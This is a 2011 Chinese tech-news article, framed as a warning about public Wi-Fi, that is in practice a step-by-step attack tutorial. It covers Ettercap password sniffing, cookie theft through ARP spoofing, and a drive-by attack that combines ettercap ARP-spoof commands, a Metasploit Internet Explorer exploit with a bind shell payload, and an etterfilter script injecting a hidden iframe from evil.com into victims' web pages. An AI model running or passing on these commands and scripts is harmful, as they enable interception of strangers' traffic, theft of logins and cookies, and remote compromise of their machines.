Top
首页 > 网络和信息安全 > 黑客攻防 > 正文

信息专家指出:小心使用公共场所的WiFi

目前在很多公共场所都提供了免费的Wifi的热点,所以很多用户都会使用这些免费的WiFi进行上网操作。随着WiFi的普及,打WiFi主意的黑客也逐渐多了起来。下面我就分析一下他们的做法
发布时间:2011-10-24 05:03        来源:        作者:子
【赛迪网-IT技术讯】随着智能手机和各类终端(如iPAD)的普及,越来越多的用户喜欢使用它们进行网上冲浪、网上购物、手机网银操作等。这些设备都提供了WiFi接入的功能,目前在很多公共场所都提供了免费的Wifi的热点,所以很多用户都会使用这些免费的WiFi进行上网操作。随着WiFi的普及,打WiFi主意的黑客也逐渐多了起来。下面我就分析一下他们的做法: 一、密码嗅探 1、使用Ettercap嗅探工具

2、选择用于嗅探数据包的网络接口

3、探测局域网内的主机列表

4、添加嗅探目标,并开始执行嗅探

5、这时如果源和目标主机进行了数据通信,且涉及到了疑是用户名密码等数据,捕获的信息将会显示

6、即使使用SSL的也同样可以被嗅探到

7、其它可以嗅探的口令信息:TELNET、FTP、POP、RLOGIN、SSH1、ICQ、SMB、MySQL、HTTP、NNTP、 X11、NAPSTER、IRC、RIP、BGP、SOCK5、IMAP4、VNC、LDAP、NFS、SNMP、HALFLIFE、QUAKE3、 MSNYMSG。 二、盗取cookie 同样使用Ettercap,然后使用arp欺骗实现:

三、arp挂马 利用ARP 欺骗把数据流都引到本地,然后替换成我们事先准备好的挂马代码,再转发出去。 • ettercap -T -q -F ieexpft -M arp:remote /192.168.1.105/ // • 表示对192.168.1.105主机进行arp欺骗 • 启动Msf的使用

• use exploit/windows/browser/ie_iepeers_pointer

• set SRVHOST 192.168.1.103(攻击者ip) • Msf会自动为我们开启类似服务 • 其他默认就可下面指定payload使用这个set PAYLOAD window/shell/bind_tcp • Payload的选项保持默认就行默认绑定4444端口 • 目标:0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

• 下面看一下ettercap的过滤脚本马上开始 • ettercap使用的过滤脚本
If(ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,"Accept-Encoding")) {
replace("Accept-Encoding","Accept-Mousecat");
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<body>") ){
replace("<body>","<body> <iframe src=\"http://evil.com/evil.html\"width=0 height=0 >");
msg("Filter Run...&&Exploit Code Injected OK!\n");
}
}
• 过滤脚本的功能 • 第一个if语句块,功能是如果ip协议匹配TCP,并且目标端口是80的话(一般是说浏览器浏览网页时候,对网站80端口发送请求),则搜索HTTP 数据流的Accept-ncoding,并且替换为Accept-Mousecat,然后在控制台打印一条“zappedAccept-Encoding”的消息,目的是为了避免目标客户端浏览器像启用了GZIP 这样的数据压缩功能。 • 第二个if 语句块,如果ip 协议匹配TCP,并且源端口是80的话,则搜索关键字, 并且替换为[body] [iframe src=“http://evil.com/evil.html” width=0 height=0 ]的代码,修改下脚本 • 我们的网马地址类似于http://192.168.1.103:8080/ZtfaWRsEf0

• 网马的地址是msf生成的。现在我们就开始生成网马(姑且这么叫)

• 最后编译一下脚本etterfilter -o ieexpft ieexp.filter

• 下面启动ettercap • 进行arp欺骗并挂马 • 我们对192.168.1.106进行arp欺骗 • 命令前面讲过了: ettercap -T -q -F ieexpft -M arp:remote /192.168.1.106/ // 已经启动了~~~我们现在随便打开一个网页看看 已经注入了我们的挂马代码~~~

(责任编辑:钼铁)

加载更多

专题访谈

合作站点
stat